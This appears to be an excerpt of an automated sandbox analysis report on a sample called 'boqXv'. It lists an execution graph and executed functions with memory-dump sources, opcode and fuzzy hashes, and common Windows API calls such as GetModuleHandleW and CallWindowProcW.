                                                execution_graph 39322 686b180 39323 686b1c2 39322->39323 39324 686b1c8 LoadLibraryExW 39322->39324 39323->39324 39325 686b1f9 39324->39325 39529 686cf10 39530 686cf78 CreateWindowExW 39529->39530 39532 686d034 39530->39532 39326 3200848 39328 320084e 39326->39328 39327 320091b 39328->39327 39332 68616e8 39328->39332 39336 68616f8 39328->39336 39340 3201390 39328->39340 39333 68616f8 39332->39333 39344 68610d0 39333->39344 39337 6861707 39336->39337 39338 68610d0 3 API calls 39337->39338 39339 6861728 39338->39339 39339->39328 39341 320139b 39340->39341 39342 32014b8 39341->39342 39451 3207408 39341->39451 39342->39328 39346 68610db 39344->39346 39348 686256c 39346->39348 39347 68630ae 39347->39347 39349 6862577 39348->39349 39350 68637d4 39349->39350 39353 6865060 39349->39353 39357 686505e 39349->39357 39350->39347 39355 6865081 39353->39355 39354 68650a5 39354->39350 39355->39354 39361 6865210 39355->39361 39358 6865081 39357->39358 39359 68650a5 39358->39359 39360 6865210 3 API calls 39358->39360 39359->39350 39360->39359 39362 686521d 39361->39362 39363 6865256 39362->39363 39365 6863574 39362->39365 39363->39354 39366 686357f 39365->39366 39368 68656c8 39366->39368 39369 6865268 39366->39369 39368->39368 39370 6865273 39369->39370 39376 6865278 39370->39376 39372 6865737 39380 686aa48 39372->39380 39388 686aa60 39372->39388 39373 6865771 39373->39368 39379 6865283 39376->39379 39377 68669c0 39377->39372 39378 6865060 3 API calls 39378->39377 39379->39377 39379->39378 39381 686aa5d 39380->39381 39382 686aa9d 39381->39382 39397 686acc8 39381->39397 39401 686acd8 39381->39401 39382->39373 39383 686aadd 39405 686bfd8 39383->39405 39412 686bfc9 39383->39412 39390 686ab91 39388->39390 39391 686aa91 39388->39391 39389 686aa9d 39389->39373 39390->39373 39391->39389 39393 686acc8 3 API calls 39391->39393 39394 686acd8 3 API calls 39391->39394 39392 686aadd 39395 686bfd8 GetModuleHandleW 39392->39395 39396 686bfc9 GetModuleHandleW 39392->39396 39393->39392 39394->39392 39395->39390 39396->39390 39419 686ad18 39397->39419 39428 686ad28 39397->39428 39398 686ace2 39398->39383 39402 686ace2 39401->39402 39403 686ad18 2 API calls 39401->39403 39404 686ad28 2 API calls 39401->39404 39402->39383 39403->39402 39404->39402 39406 686c003 39405->39406 39437 686c530 39406->39437 39442 686c540 39406->39442 39407 686c086 39408 6869ee0 GetModuleHandleW 39407->39408 39409 686c0b2 39407->39409 39408->39409 39413 686bfd9 39412->39413 39417 686c530 GetModuleHandleW 39413->39417 39418 686c540 GetModuleHandleW 39413->39418 39414 686c086 39416 686c0b2 39414->39416 39447 6869ee0 39414->39447 39417->39414 39418->39414 39420 686ad1d 39419->39420 39421 6869ee0 GetModuleHandleW 39420->39421 39423 686ad5c 39420->39423 39422 686ad44 39421->39422 39422->39423 39427 686afb2 GetModuleHandleW 39422->39427 39423->39398 39424 686af60 GetModuleHandleW 39426 686af8d 39424->39426 39425 686ad54 39425->39423 39425->39424 39426->39398 39427->39425 39429 686ad39 39428->39429 39432 686ad5c 39428->39432 39430 6869ee0 GetModuleHandleW 39429->39430 39431 686ad44 39430->39431 39431->39432 39436 686afb2 GetModuleHandleW 39431->39436 39432->39398 39433 686af60 GetModuleHandleW 39435 686af8d 39433->39435 39434 686ad54 39434->39432 39434->39433 39435->39398 39436->39434 39438 686c541 39437->39438 39439 686c5ee 39438->39439 39440 686c6a0 GetModuleHandleW 39438->39440 39441 686c6b0 GetModuleHandleW 39438->39441 39440->39439 39441->39439 39443 686c56d 39442->39443 39444 686c5ee 39443->39444 39445 686c6a0 GetModuleHandleW 39443->39445 39446 686c6b0 GetModuleHandleW 39443->39446 39445->39444 39446->39444 39449 686af18 GetModuleHandleW 39447->39449 39450 686af8d 39449->39450 39450->39416 39452 3207412 39451->39452 39453 320742c 39452->39453 39456 687d810 39452->39456 39460 687d820 39452->39460 39453->39341 39458 687d820 39456->39458 39457 687da4a 39457->39453 39458->39457 39459 687da61 GlobalMemoryStatusEx 39458->39459 39459->39458 39462 687d835 39460->39462 39461 687da4a 39461->39453 39462->39461 39463 687da61 GlobalMemoryStatusEx 39462->39463 39463->39462 39464 6862a48 DuplicateHandle 39465 6862ade 39464->39465 39466 192d01c 39468 192d034 39466->39468 39467 192d08e 39468->39467 39473 686d0c8 39468->39473 39477 686e16a 39468->39477 39486 686a0c4 39468->39486 39495 686d0b7 39468->39495 39474 686d0ee 39473->39474 39475 686a0c4 CallWindowProcW 39474->39475 39476 686d10f 39475->39476 39476->39467 39478 686e221 39477->39478 39479 686e289 39478->39479 39481 686e279 39478->39481 39515 686a18c 39479->39515 39499 686e3a0 39481->39499 39504 686e47c 39481->39504 39510 686e3b0 39481->39510 39482 686e287 39487 686a0cf 39486->39487 39488 686e289 39487->39488 39490 686e279 39487->39490 39489 686a18c CallWindowProcW 39488->39489 39491 686e287 39489->39491 39492 686e3a0 CallWindowProcW 39490->39492 39493 686e3b0 CallWindowProcW 39490->39493 39494 686e47c CallWindowProcW 39490->39494 39492->39491 39493->39491 39494->39491 39496 686d0c1 39495->39496 39497 686a0c4 CallWindowProcW 39496->39497 39498 686d10f 39497->39498 39498->39467 39501 686e3b1 39499->39501 39500 686e450 39500->39482 39519 686e458 39501->39519 39523 686e468 39501->39523 39505 686e48a 39504->39505 39506 686e43a 39504->39506 39508 686e458 CallWindowProcW 39506->39508 39509 686e468 CallWindowProcW 39506->39509 39507 686e450 39507->39482 39508->39507 39509->39507 39512 686e3c4 39510->39512 39511 686e450 39511->39482 39513 686e458 CallWindowProcW 39512->39513 39514 686e468 CallWindowProcW 39512->39514 39513->39511 39514->39511 39516 686a197 39515->39516 39517 686f6ea CallWindowProcW 39516->39517 39518 686f699 39516->39518 39517->39518 39518->39482 39520 686e461 39519->39520 39521 686e479 39520->39521 39526 686f630 39520->39526 39521->39500 39524 686e479 39523->39524 39525 686f630 CallWindowProcW 39523->39525 39524->39500 39525->39524 39527 686a18c CallWindowProcW 39526->39527 39528 686f63a 39527->39528 39528->39521

                                                Executed Functions

                                                Function 03209EA8 Relevance: 2.8, Instructions: 2818COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5c572179da06b54fb469fdf68f657c613040287c96b9bc1304f844671f9310d
                                                • Instruction ID: 1e26e80c3bdbe88208c0b46ea62cdda0f3071b017898359783426e140bb7b381
                                                • Opcode Fuzzy Hash: d5c572179da06b54fb469fdf68f657c613040287c96b9bc1304f844671f9310d
                                                • Instruction Fuzzy Hash: 8E53F971C10B1A8ACB51EF68C880599F7B1FF99300F15D79AE4587B221FB70AAD5CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0320D128 Relevance: 2.3, Instructions: 2333COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b055e354601a2127ee3b6b5e022802332b2a3cccc0b532812af0bd7097848af3
                                                • Instruction ID: 3c97c330729ceda461cc1dc8e8ac036150a9279d3f12c239a5170ef0c01906a3
                                                • Opcode Fuzzy Hash: b055e354601a2127ee3b6b5e022802332b2a3cccc0b532812af0bd7097848af3
                                                • Instruction Fuzzy Hash: 18333131D10B1A8ECB11EF68C89059DF7B5FF99300F15C79AE458A7261EB70AAC5CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03204AD0 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c80fb6c91052660955b637b5588a09ee8923cfdd9668a95ac2570acc3177484
                                                • Instruction ID: dfc0241469063e528ce376b9c5ef9825f2455e0e2ab5b62a22a7676246428076
                                                • Opcode Fuzzy Hash: 2c80fb6c91052660955b637b5588a09ee8923cfdd9668a95ac2570acc3177484
                                                • Instruction Fuzzy Hash: E9B17170E1020ACFDB14DFAAD88179DBBF2AF88314F18C129D514E7295EB749889CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03203EB8 Relevance: .2, Instructions: 238COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c18c8211529edaead052aa023ad4cab70ae29d667ece48eab69c0fdfb06f1df
                                                • Instruction ID: 1764ed32253d4698d09424c0ce60e276241102cef1403944ec9bf2edb87834fd
                                                • Opcode Fuzzy Hash: 4c18c8211529edaead052aa023ad4cab70ae29d667ece48eab69c0fdfb06f1df
                                                • Instruction Fuzzy Hash: BE916F70E102099FDF14DFAAC98479DFBF2AF88714F18C129E514A7295DB749889CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0686AD28 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3234 686ad28-686ad37 3235 686ad63-686ad67 3234->3235 3236 686ad39-686ad46 call 6869ee0 3234->3236 3238 686ad7b-686adbc 3235->3238 3239 686ad69-686ad73 3235->3239 3243 686ad5c 3236->3243 3244 686ad48-686ad56 call 686afb2 3236->3244 3245 686adbe-686adc6 3238->3245 3246 686adc9-686add7 3238->3246 3239->3238 3243->3235 3244->3243 3253 686ae98-686af58 3244->3253 3245->3246 3247 686adfb-686adfd 3246->3247 3248 686add9-686adde 3246->3248 3250 686ae00-686ae07 3247->3250 3251 686ade0-686ade7 call 6869eec 3248->3251 3252 686ade9 3248->3252 3255 686ae14-686ae1b 3250->3255 3256 686ae09-686ae11 3250->3256 3257 686adeb-686adf9 3251->3257 3252->3257 3285 686af60-686af8b GetModuleHandleW 3253->3285 3286 686af5a-686af5d 3253->3286 3260 686ae1d-686ae25 3255->3260 3261 686ae28-686ae31 call 68632d4 3255->3261 3256->3255 3257->3250 3260->3261 3265 686ae33-686ae3b 3261->3265 3266 686ae3e-686ae43 3261->3266 3265->3266 3267 686ae45-686ae4c 3266->3267 3268 686ae61-686ae6e 3266->3268 3267->3268 3270 686ae4e-686ae5e call 6868548 call 6869efc 3267->3270 3275 686ae70-686ae8e 3268->3275 3276 686ae91-686ae97 3268->3276 3270->3268 3275->3276 3287 686af94-686afa8 3285->3287 3288 686af8d-686af93 3285->3288 3286->3285 3288->3287
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2976628016.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6860000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 9d6e69ac4acd6a3931d23107abf6b9d6dcff41b6099c7ed3850fa7342bf7eca3
                                                • Instruction ID: adbf8041b15daa7c34918a24d2e5c7666084f22e78464e4b83dfcd187bebe714
                                                • Opcode Fuzzy Hash: 9d6e69ac4acd6a3931d23107abf6b9d6dcff41b6099c7ed3850fa7342bf7eca3
                                                • Instruction Fuzzy Hash: 45714670A00B058FDBA8DF2AD44475ABBF5FF88304F00892DE58AD7A50DB74E945CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0687E628 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2977058100.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6870000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b83e22124d1471e602dedeed4beb0d471d309e110f461802f4e0bcfa9f8c52a9
                                                • Instruction ID: c56ee8b4464760f78564259fec4d49c938a66e7faa8ab387520358b6a25cdf5c
                                                • Opcode Fuzzy Hash: b83e22124d1471e602dedeed4beb0d471d309e110f461802f4e0bcfa9f8c52a9
                                                • Instruction Fuzzy Hash: 7C410F72D002598BCB04DF69D8447AEBBF9EF88310F14856ADA04E7341DB78E885CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0686CF04 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0686D022
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2976628016.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6860000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 997fc5ede3c929a5f093c9f16a9b8428cc5784562b6f161b023631a020e62c2a
                                                • Instruction ID: 25d5af75ee614417635bf7a399e2bb8ffdf2d1554d7108532aeb5f091fcd5285
                                                • Opcode Fuzzy Hash: 997fc5ede3c929a5f093c9f16a9b8428cc5784562b6f161b023631a020e62c2a
                                                • Instruction Fuzzy Hash: 8651CFB1D00359DFDB14CFAAC884ADEBBB5FF48314F24812AE819AB210D7759885CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0686CF10 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0686D022
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2976628016.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6860000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: f34c42bef538b46a89da89dcbd274598027c3bad317818f4629fdc1d472881b5
                                                • Instruction ID: 261b8faf9f092d1bfc4b68191e5d7b231afef9857396eb323b596f4c8f571023
                                                • Opcode Fuzzy Hash: f34c42bef538b46a89da89dcbd274598027c3bad317818f4629fdc1d472881b5
                                                • Instruction Fuzzy Hash: 7341BFB1D00359DFDB14CFAAC884ADEBBB5FF48314F24812AE818AB210D7759885CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0686A18C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0686F711
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2976628016.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6860000_boqXv.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 72d056c31910e674e78f8c8bc181e04609306e68bc9c2d521792f0b9a375d88d
                                                • Instruction ID: a228f4727e952c14bf89af5ec116914130475d9fe51b175424e714db4f3d1af5
                                                • Opcode Fuzzy Hash: 72d056c31910e674e78f8c8bc181e04609306e68bc9c2d521792f0b9a375d88d
                                                • Instruction Fuzzy Hash: 364118B8900245DFCB54CF5AD448AAEBBF6FB88314F24C459E619AB321D774E841CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0687E710 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(000000ED), ref: 0687E777
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2977058100.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6870000_boqXv.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: d08c297e7db9b74509827c59f35b28b35dc3f8b2380e9d1ffa3bc7f92baab629
                                                • Instruction ID: 788cfda8112757a27e881bf793a41f9e363abb3a9e37fe052a60b75b717a16d4
                                                • Opcode Fuzzy Hash: d08c297e7db9b74509827c59f35b28b35dc3f8b2380e9d1ffa3bc7f92baab629
                                                • Instruction Fuzzy Hash: A21112B1C002699BCB10CF9AC444BDEFBF4BF48320F14816AD918A7251D378A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0320F66D Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH^q
                                                • API String ID: 0-2549759414
                                                • Opcode ID: 03638c17f96e844c4b48d16417b70c0f83cc1b14efa5ea11b5db33182f84c397
                                                • Instruction ID: cd7ac56985034e89a17582f935625cd68acb8c78a132d5dd0bb21ed4f48f78f0
                                                • Opcode Fuzzy Hash: 03638c17f96e844c4b48d16417b70c0f83cc1b14efa5ea11b5db33182f84c397
                                                • Instruction Fuzzy Hash: D4312535B402029FCB25DF34C65426E7BF6AF88200F184469D00ADB3A5EF35DD8ACB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032072F0 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q
                                                • API String ID: 0-2625958711
                                                • Opcode ID: 9f4e66bcb3849b70016a14654c87252ed0c051043c330da2c4bf885b4580b45f
                                                • Instruction ID: 391490c74903c6df8321a8995e0ae7e53edcc3a0e3bd48c665d611855299f209
                                                • Opcode Fuzzy Hash: 9f4e66bcb3849b70016a14654c87252ed0c051043c330da2c4bf885b4580b45f
                                                • Instruction Fuzzy Hash: 62317030E2020ADBEF14CFB8D44479EB7B6FF85310F248565E805EB281EB70A986CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032072E0 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q
                                                • API String ID: 0-2625958711
                                                • Opcode ID: d4cfcf3055208aaad741dd6ff4c9d63bd960058d1f5959b14f000058aa0f414a
                                                • Instruction ID: e92004e086df71bdb4830739c3f3f05ce5ffd9b7994aec081acde5f9a2c8a371
                                                • Opcode Fuzzy Hash: d4cfcf3055208aaad741dd6ff4c9d63bd960058d1f5959b14f000058aa0f414a
                                                • Instruction Fuzzy Hash: E6317030E2020A9FEF15CF78C45579EB7B5FF85310F248469E805EB281E770A986CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03206BBF Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q
                                                • API String ID: 0-2625958711
                                                • Opcode ID: 7f67834be21e0a5ff15166f199543302be01c9b5b57417182dab04651166f76f
                                                • Instruction ID: c40a387abeda5fd9c42f3ac5727beb946f651cc6aa35c6b00402e9ab2b5dc4c9
                                                • Opcode Fuzzy Hash: 7f67834be21e0a5ff15166f199543302be01c9b5b57417182dab04651166f76f
                                                • Instruction Fuzzy Hash: 762122302142059FC715EB3DD45879E7BB9EF89720F1048AAD0488B39AEE759C85CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03207C81 Relevance: .6, Instructions: 555COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 381f4bcba3d1f0c88a18c928ce9f8b6ed767dc4472e26a954dba3634b977d696
                                                • Instruction ID: d605f3dd7751494b05652e2d85c4ee39cb71c05f7ebee07d2bef52b9af6f2d3c
                                                • Opcode Fuzzy Hash: 381f4bcba3d1f0c88a18c928ce9f8b6ed767dc4472e26a954dba3634b977d696
                                                • Instruction Fuzzy Hash: C5128230700106DFDB25A738E65822E76A6FBC9364F245979D005CB359CF79EDCA8781
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03209A58 Relevance: .4, Instructions: 351COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fafa6cae0882c39b57b048a0f82a2394ad03abe1267d33baf3cf7df776df78b9
                                                • Instruction ID: 2eb07def55ecac8d9e5b9779b88d481fe0be2a33281f58dabbcf3bdefc3ee2a8
                                                • Opcode Fuzzy Hash: fafa6cae0882c39b57b048a0f82a2394ad03abe1267d33baf3cf7df776df78b9
                                                • Instruction Fuzzy Hash: 2CC1B171A102068FDF14DF68D8807AEB7B6FB88310F14856AE50ADB3A6D770DD85CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032096DC Relevance: .3, Instructions: 302COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31ac2cb7c1e26e52e9085c0fc6678d944a37799ac6e51fe931151fb46cefdb96
                                                • Instruction ID: 2f3790a9cf3d809c8137e774e0b12a541c3ab8c83004a0b82eba6b9b4563a6de
                                                • Opcode Fuzzy Hash: 31ac2cb7c1e26e52e9085c0fc6678d944a37799ac6e51fe931151fb46cefdb96
                                                • Instruction Fuzzy Hash: C7B18F39A101058FDF14DF68D984AADBBF6EF88310F148565E806E73A6DB34ED85CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03204AC4 Relevance: .3, Instructions: 262COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 954fa7dbe1e58c4d8bff23873ebfa31f880b36d9ab5f4698c55f0d3653e7ccd6
                                                • Instruction ID: dd78e63760b668416837beac2addf6f38ce19d1938e06716f123f5601734f387
                                                • Opcode Fuzzy Hash: 954fa7dbe1e58c4d8bff23873ebfa31f880b36d9ab5f4698c55f0d3653e7ccd6
                                                • Instruction Fuzzy Hash: 07B16E71E1020ADFDB10DFAAD88579DFBF1AF48314F18C129D914AB295EB749889CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03203EAC Relevance: .2, Instructions: 235COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 75c8347ba4cd443d7c2f2562fa573e6fd7ebdda2d5a2470310ef95d0a4078c9f
                                                • Instruction ID: cffadd50ad3f21879d9cb7947660b81b4c627310c260220ac8d9e97a0f46a57a
                                                • Opcode Fuzzy Hash: 75c8347ba4cd443d7c2f2562fa573e6fd7ebdda2d5a2470310ef95d0a4078c9f
                                                • Instruction Fuzzy Hash: 0A917E70E1020ADFDF14DFAAC98479DFBF2AF48704F188129E514A7295DB749889CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03204848 Relevance: .2, Instructions: 180COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6b9ae73bc665d4ddbfb6faa7653249cf2104d230a5971d8a026f61f12d355e3
                                                • Instruction ID: 61e79fcec3e574ca4a197bc70e2bbab2e7b9b65cfa0c14daba91f94801b33807
                                                • Opcode Fuzzy Hash: f6b9ae73bc665d4ddbfb6faa7653249cf2104d230a5971d8a026f61f12d355e3
                                                • Instruction Fuzzy Hash: 40718D70E102199FDF10DFAAC88179DFBF2AF88314F18C029E554AB295DB749889CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0320483E Relevance: .2, Instructions: 177COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39b27fd6b106a27057c68c356423876cc310f1a588dc90307b8f0ad806bbf63a
                                                • Instruction ID: 27645a10e891baf29990197f99ce0d74f6612956657b45b9eadc75020d54ba94
                                                • Opcode Fuzzy Hash: 39b27fd6b106a27057c68c356423876cc310f1a588dc90307b8f0ad806bbf63a
                                                • Instruction Fuzzy Hash: 8A718C70E1021A9FDF10DFA9C88179DFBF1AF88314F18C029E554AB295EB749889CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03206D0C Relevance: .1, Instructions: 136COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d4fc8399d2e28482289b491efa0316ef8964b3dc9894703728279465f711fca
                                                • Instruction ID: 56b278e45e71047eff943109f7946ae8a0f41e15be148116603cd4c609537b67
                                                • Opcode Fuzzy Hash: 4d4fc8399d2e28482289b491efa0316ef8964b3dc9894703728279465f711fca
                                                • Instruction Fuzzy Hash: CF5103B1D102198FDB14CFA9C884B9DBBB5FF48314F148019E819BB291D774A889CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03206D18 Relevance: .1, Instructions: 132COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08cb4ffa542fb7ab3af9a6e736da2ff237123f40b650f26be21163bc7df907c4
                                                • Instruction ID: 750c4330d06f3e962d18297c54fa9823d1ed457dfcfa8183eda6c81ce9d42216
